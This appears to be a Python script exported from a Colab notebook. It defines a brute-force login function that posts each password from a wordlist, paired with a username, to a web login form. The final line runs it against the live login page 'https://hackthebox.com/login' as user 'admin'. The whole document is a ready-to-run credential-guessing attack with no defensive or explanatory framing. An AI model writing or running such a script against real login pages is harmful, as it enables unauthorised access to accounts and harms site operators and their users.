# -*- coding: utf-8 -*-
"""Untitled10.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/18FX79wFTkPD9uf92xk2-pvGinXgVawk7
"""

import requests

def brute_force_login(username,targeturl,password_list="/content/password.txt"):
  with open(password_list,"r") as file:
    for password in file.readlines():
      password=password.strip()
      data={"username":username,"password":password}
      response = requests.post(targeturl,data=data)
      if "Login failed" not in response.text:
        print(f"Possible credentials found : {username}:{password}")
        return
  print("No valid credentials found")

brute_force_login("admin","https://hackthebox.com/login")